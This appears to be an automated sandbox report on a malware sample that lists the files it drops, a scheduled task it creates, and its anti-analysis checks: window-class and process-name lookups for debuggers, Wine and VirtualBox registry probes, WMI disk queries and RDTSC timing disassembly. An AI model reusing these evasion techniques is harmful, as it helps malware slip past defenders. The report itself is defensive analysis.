Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32\pywintypes313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

Jump to behavior

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 7_2_00007FF7E12C76C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

7_2_00007FF7E12C76C0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\dxdiag.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\dxdiag.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} WHERE ResultClass = Win32_DiskDrive
Source: C:\Windows\System32\dxdiag.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\dxdiag.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\dxdiag.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DXENSERVICE.EXE4P
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DWIRESHARK.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: QEMU-GA.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMUSRVC.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DX64DBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DFIDDLER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DOLLYDBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DQEMU-GA.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DVMUSRVC.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: XENSERVICE.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DPROCESSHACKER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B1253 second address: 8B125F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F8481503866h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B125F second address: 8B1263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B1651 second address: 8B1657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B1657 second address: 8B165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B165E second address: 8B1683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503870h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B1683 second address: 8B1691 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F8480743926h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B193C second address: 8B194C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B194C second address: 8B1962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B1962 second address: 8B1968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B1968 second address: 8B1977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8480743926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B57E3 second address: 8B5813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e jmp 00007F8481503874h 0x00000013 pop edx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B5813 second address: 8B5835 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F848074392Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B5835 second address: 8B5839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B58CF second address: 8B58DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B5A5A second address: 8B5AAD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F8481503868h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor cx, 77B8h 0x0000002a pushad 0x0000002b mov edx, dword ptr [ebp+122D35B4h] 0x00000031 movzx esi, cx 0x00000034 popad 0x00000035 push 00000000h 0x00000037 xor dword ptr [ebp+122D1F0Ch], esi 0x0000003d push E7EFC6E9h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 js 00007F8481503866h 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B5AAD second address: 8B5AB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B5AB2 second address: 8B5B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 18103997h 0x0000000e mov ecx, dword ptr [ebp+122D3868h] 0x00000014 push 00000003h 0x00000016 and cl, 00000032h 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D19F8h], esi 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push edx 0x00000026 call 00007F8481503868h 0x0000002b pop edx 0x0000002c mov dword ptr [esp+04h], edx 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc edx 0x00000039 push edx 0x0000003a ret 0x0000003b pop edx 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D1A2Fh], ebx 0x00000043 push BBD99289h 0x00000048 pushad 0x00000049 jbe 00007F8481503868h 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B5B83 second address: 8B5C26 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F8480743928h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1878h], ecx 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 add edx, dword ptr [ebp+122D38A4h] 0x00000037 pop ecx 0x00000038 push ecx 0x00000039 xor edi, dword ptr [ebp+122D3718h] 0x0000003f pop ecx 0x00000040 call 00007F8480743929h 0x00000045 jmp 00007F8480743935h 0x0000004a push eax 0x0000004b jmp 00007F8480743930h 0x00000050 mov eax, dword ptr [esp+04h] 0x00000054 push esi 0x00000055 jp 00007F848074392Ch 0x0000005b pop esi 0x0000005c mov eax, dword ptr [eax] 0x0000005e pushad 0x0000005f jmp 00007F848074392Ch 0x00000064 jbe 00007F848074392Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B5C26 second address: 8B5CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F8481503868h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1E38h], edx 0x00000030 push 00000003h 0x00000032 call 00007F848150386Ah 0x00000037 movzx edx, dx 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d mov esi, 07D34AC9h 0x00000042 push 00000003h 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007F8481503868h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 00000015h 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e jmp 00007F8481503873h 0x00000063 push B13CA0F6h 0x00000068 push esi 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D5CDE second address: 8D5CE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D5CE3 second address: 8D5CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8ACB19 second address: 8ACB45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8480743926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jno 00007F8480743926h 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 pop ebx 0x00000017 pushad 0x00000018 jmp 00007F8480743931h 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3BB5 second address: 8D3BDF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8481503868h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8481503878h 0x0000000f js 00007F8481503866h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3BDF second address: 8D3BFD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F8480743926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F8480743928h 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3BFD second address: 8D3C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3C01 second address: 8D3C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3C07 second address: 8D3C18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848150386Bh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3C18 second address: 8D3C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3EE0 second address: 8D3EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4012 second address: 8D401D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D401D second address: 8D4023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D44F7 second address: 8D44FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D44FF second address: 8D4503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4624 second address: 8D4628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4628 second address: 8D464C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503873h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F848150386Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D464C second address: 8D4656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4783 second address: 8D4787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
